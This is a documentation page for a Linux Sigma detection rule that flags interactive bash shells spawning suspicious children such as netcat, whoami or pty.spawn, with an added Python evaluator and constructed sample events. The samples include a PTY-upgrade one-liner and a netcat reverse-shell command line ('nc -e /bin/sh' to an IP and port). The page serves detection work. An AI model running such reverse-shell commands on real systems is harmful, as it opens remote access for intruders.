Type: Detection | Level: medium | Status: test

Interactive Bash Suspicious Children

Detects an interactive bash shell (parent command line `bash -i`) spawning child processes that are uncommon for a normal interactive session (inline Python imports, base64 handling, PTY spawning, recon and firewall tools, netcat variants).

Author: Florian Roth (Nextron Systems) | Created: Mon Mar 14 | Rule ID: ea3ecad2-db86-4a89-ad0b-132a10d2db55 | Product: linux
Log Source
Product: Linux (raw: linux)
Category: Process Creation (raw: process_creation)

Events generated when a new process is spawned on the system. Covers command-line arguments, parent/child relationships, and process metadata.

Detection Logic (3 selectors)
detection:
    selection:
        ParentCommandLine: 'bash -i'
    anomaly1:
        CommandLine|contains:
            - '-c import '
            - 'base64'
            - 'pty.spawn'
    anomaly2:
        Image|endswith:
            - 'whoami'
            - 'iptables'
            - '/ncat'
            - '/nc'
            - '/netcat'
    condition: selection and 1 of anomaly*
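To see how the three selectors combine, the following added example (written for this page, not Sigma's, pySigma's or any backend's code) evaluates the detection block above against constructed process-creation events using Sigma's string semantics: case-insensitive matching, plain values as whole-field matches with `*`/`?` wildcards, and `contains`/`endswith` as substring and suffix tests. The event field names (`ParentCommandLine`, `CommandLine`, `Image`) mirror the rule; the sample events are invented. One caveat it makes visible: `ParentCommandLine: 'bash -i'` is a whole-field match, so a source that logs the parent as `/bin/bash -i` produces no hit for an otherwise identical event, which is worth checking against your own telemetry before relying on the rule.

```python
"""Evaluate the Sigma detection block above over constructed process-creation
events. Added example, not Sigma's, pySigma's or any backend's code; the event
field names mirror the rule (ParentCommandLine, CommandLine, Image)."""
import re

# Transcribed from the rule's detection block; keys carry Sigma field|modifier.
DETECTION = {
    "selection": {"ParentCommandLine": "bash -i"},
    "anomaly1": {"CommandLine|contains": ["-c import ", "base64", "pty.spawn"]},
    "anomaly2": {"Image|endswith": ["whoami", "iptables", "/ncat", "/nc", "/netcat"]},
}


def _wildcard_regex(pattern):
    """Plain Sigma values are whole-field matches where '*' and '?' are wildcards."""
    escaped = re.escape(pattern).replace(r"\*", ".*").replace(r"\?", ".")
    return re.compile(rf"^{escaped}$", re.IGNORECASE | re.DOTALL)


def match_value(field_value, pattern, modifier=None):
    """Sigma string semantics: case-insensitive; no modifier means full match."""
    if field_value is None:  # a missing field never matches
        return False
    value, pat = str(field_value).lower(), str(pattern).lower()
    if modifier is None:
        return _wildcard_regex(pat).fullmatch(value) is not None
    if modifier == "contains":
        return pat in value
    if modifier == "startswith":
        return value.startswith(pat)
    if modifier == "endswith":
        return value.endswith(pat)
    raise ValueError(f"unsupported modifier: {modifier}")


def selector_matches(event, selector):
    """Entries within one selector are AND-ed; a list of values for a field is OR-ed."""
    for key, values in selector.items():
        field, _, modifier = key.partition("|")
        candidates = values if isinstance(values, list) else [values]
        if not any(match_value(event.get(field), c, modifier or None) for c in candidates):
            return False
    return True


def rule_matches(event):
    """condition: selection and 1 of anomaly*"""
    if not selector_matches(event, DETECTION["selection"]):
        return False
    anomalies = [sel for name, sel in DETECTION.items() if name.startswith("anomaly")]
    return any(selector_matches(event, sel) for sel in anomalies)


# Constructed sample events (not real telemetry).
SAMPLE_EVENTS = [
    # PTY upgrade of a reverse shell: 'pty.spawn' appears in the child command line.
    {"ParentCommandLine": "bash -i", "Image": "/usr/bin/python3",
     "CommandLine": "python3 -c 'import pty; pty.spawn(\"/bin/bash\")'"},
    # Host recon from the interactive shell: Image ends with 'whoami'.
    {"ParentCommandLine": "bash -i", "Image": "/usr/bin/whoami", "CommandLine": "whoami"},
    # Benign child of an interactive bash: selection hits, neither anomaly does.
    {"ParentCommandLine": "bash -i", "Image": "/usr/bin/vim", "CommandLine": "vim notes.txt"},
    # Same netcat child, but the parent was logged with its full path: the plain
    # value 'bash -i' is a whole-field match, so this event is missed.
    {"ParentCommandLine": "/bin/bash -i", "Image": "/usr/bin/nc",
     "CommandLine": "nc -e /bin/sh 10.0.0.5 4444"},
    # netcat from a non-interactive 'bash -c': selection does not match.
    {"ParentCommandLine": "bash -c ./run.sh", "Image": "/usr/bin/nc",
     "CommandLine": "nc -z localhost 80"},
]


def evaluate_samples(events=SAMPLE_EVENTS):
    """Return one verdict per event, in order."""
    return [rule_matches(e) for e in events]


if __name__ == "__main__":
    for event, hit in zip(SAMPLE_EVENTS, evaluate_samples()):
        print("ALERT " if hit else "      ", event["ParentCommandLine"], "->", event["CommandLine"])
```

Running it prints an alert for the first two events only. Note also that in the first event the `-c import ` pattern does not fire because the shell quote sits between `-c` and `import`; whether quotes survive into `CommandLine` depends on how the log source joins argv, so the `pty.spawn` pattern is what carries that match.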
False Positives

Legitimate software that uses these patterns

References
1. Internal Research
Rule Metadata
Rule ID
ea3ecad2-db86-4a89-ad0b-132a10d2db55
Status
test
Level
medium
Type
Detection
Created
Mon Mar 14
Path
rules/linux/process_creation/proc_creation_lnx_susp_interactive_bash.yml
Raw Tags
attack.execution, attack.defense-evasion, attack.t1059.004 (Command and Scripting Interpreter: Unix Shell), attack.t1036 (Masquerading)